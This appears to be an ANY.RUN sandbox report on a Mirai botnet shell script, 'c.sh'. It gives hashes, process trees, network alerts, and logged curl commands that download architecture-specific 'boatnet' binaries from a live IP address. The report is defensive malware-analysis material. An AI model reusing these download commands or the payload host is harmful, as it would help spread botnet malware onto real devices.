File name:

c.sh

Full analysis: https://app.any.run/tasks/cffa73e3-0e18-4bd4-b224-e1b01c1957be
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: May 16, 2025, 06:50:22
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

28ED7C0F84D2555DD6F59816C529693E

SHA1:

BD991B50CCBF24DCBDA3B7D3C3A1E201E6C006C9

SHA256:

54B960A591DC1C805106F96A04DDCFF5AF1CCE3D418E22B6C461D2E7C84703DE

SSDEEP:

24:3J3V7933IW79wSIl79xNIejI679KLK/IP7919Is79ysI379ft9Is79mwIz79iAfG:l34WwH/DkqKLJh1y0y15fty0mZViFkYl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • curl (PID: 40012)

  • SUSPICIOUS

    • Reads passwd file

      • dumpe2fs (PID: 39892)
      • dumpe2fs (PID: 39903)
      • curl (PID: 39906)
      • curl (PID: 39934)
      • curl (PID: 40038)
      • curl (PID: 40117)
      • curl (PID: 40091)
      • curl (PID: 39960)
      • curl (PID: 39988)
      • curl (PID: 40012)
      • curl (PID: 40066)
      • curl (PID: 40141)
      • curl (PID: 40168)
      • curl (PID: 39870)

    • Check the Environment Variables Related to System Identification (os-release)

      • curl (PID: 39870)
      • curl (PID: 39906)
      • curl (PID: 40066)
      • curl (PID: 40091)
      • curl (PID: 40117)
      • curl (PID: 40141)
      • curl (PID: 39960)
      • curl (PID: 39988)
      • curl (PID: 40012)
      • curl (PID: 40038)
      • curl (PID: 40168)
      • curl (PID: 39934)

    • Modifies file or directory owner

      • sudo (PID: 39863)

    • Executes commands using command-line interpreter

      • sudo (PID: 39866)
      • bash (PID: 39868)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 39868)

    • Potential Corporate Privacy Violation

      • curl (PID: 40066)
      • curl (PID: 39988)
      • curl (PID: 39960)
      • curl (PID: 39934)
      • curl (PID: 40141)
      • curl (PID: 40168)
      • curl (PID: 40012)
      • curl (PID: 40038)
      • curl (PID: 40117)
      • curl (PID: 40091)
      • curl (PID: 39906)
      • curl (PID: 39870)

  • INFO

    • Checks timezone

      • dumpe2fs (PID: 39892)
      • dumpe2fs (PID: 39903)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
214
Monitored processes
83
Malicious processes
3
Suspicious processes
12

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs systemctl no specs bash no specs locale-check no specs curl snap-seccomp no specs snap-confine no specs dumpe2fs no specs snap-update-ns no specs dumpe2fs no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs #MIRAI curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
39862/bin/sh -c "sudo chown user /tmp/c\.sh && chmod +x /tmp/c\.sh && DISPLAY=:0 sudo -iu user /tmp/c\.sh "/usr/bin/dashoF5qt7VjSoEVMhQn
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39863sudo chown user /tmp/c.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
39864chown user /tmp/c.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39865chmod +x /tmp/c.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39866sudo -iu user /tmp/c.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
39867systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libcap.so.2.44
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/lib/x86_64-linux-gnu/liblzma.so.5.2.5
/usr/lib/x86_64-linux-gnu/liblz4.so.1.9.3
/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8
/usr/lib/x86_64-linux-gnu/libblkid.so.1.1.0
/usr/lib/x86_64-linux-gnu/libgcrypt.so.20.3.4
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libgpg-error.so.0.32.1
39868-bash --login -c \/tmp\/c\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
39869/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39870/snap/curl/1754/bin/curl http://87.121.79.139/boatnet.arm/snap/curl/1754/bin/curl
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libpthread.so.0
/usr/lib/x86_64-linux-gnu/libudev.so.1.7.2
/usr/lib/x86_64-linux-gnu/libdl.so.2
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/snap/curl/1754/lib/libcurl.so.4.8.0
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpthread-2.31.so
/snap/curl/1754/usr/lib/x86_64-linux-gnu/libnghttp2.so.14.19.0
/snap/curl/1754/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.6
39884/snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info/snap/snapd/20290/usr/lib/snapd/snap-seccompcurl
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpthread.so.0
/usr/lib/x86_64-linux-gnu/libc.so.6
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
22
DNS requests
11
Threats
38

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
39906
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.arm5
unknown
unknown
39870
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.arm
unknown
unknown
39934
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.arm6
unknown
unknown
39988
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.m68k
unknown
unknown
39960
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.arm7
unknown
unknown
40012
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.mips
unknown
unknown
40038
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.mpsl
unknown
unknown
40091
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.sh4
unknown
unknown
40066
curl
GET
200
87.121.79.139:80
http://87.121.79.139/boatnet.ppc
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
37.19.194.81:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
39870
curl
87.121.79.139:80
Neterra Ltd.
BG
unknown
39906
curl
87.121.79.139:80
Neterra Ltd.
BG
unknown
39934
curl
87.121.79.139:80
Neterra Ltd.
BG
unknown
39960
curl
87.121.79.139:80
Neterra Ltd.
BG
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.181.238
  • 2a00:1450:4001:80b::200e
whitelisted
connectivity-check.ubuntu.com
  • 185.125.190.96
  • 91.189.91.96
  • 185.125.190.18
  • 91.189.91.98
  • 91.189.91.49
  • 185.125.190.48
  • 185.125.190.98
  • 185.125.190.17
  • 185.125.190.97
  • 185.125.190.49
  • 91.189.91.48
  • 2620:2d:4002:1::196
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::23
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::23
whitelisted
odrs.gnome.org
  • 37.19.194.81
  • 195.181.170.18
  • 169.150.255.181
  • 169.150.255.184
  • 212.102.56.178
  • 207.211.211.27
  • 195.181.175.40
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::18
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.54
  • 185.125.188.57
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
whitelisted
11.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
39870
curl
Potentially Bad Traffic
ET INFO ARM File Download Request from IP Address
39870
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
39870
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39906
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
39906
curl
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39934
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
39906
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39934
curl
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39934
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39960
curl
Potentially Bad Traffic
ET INFO ARM7 File Download Request from IP Address
No debug info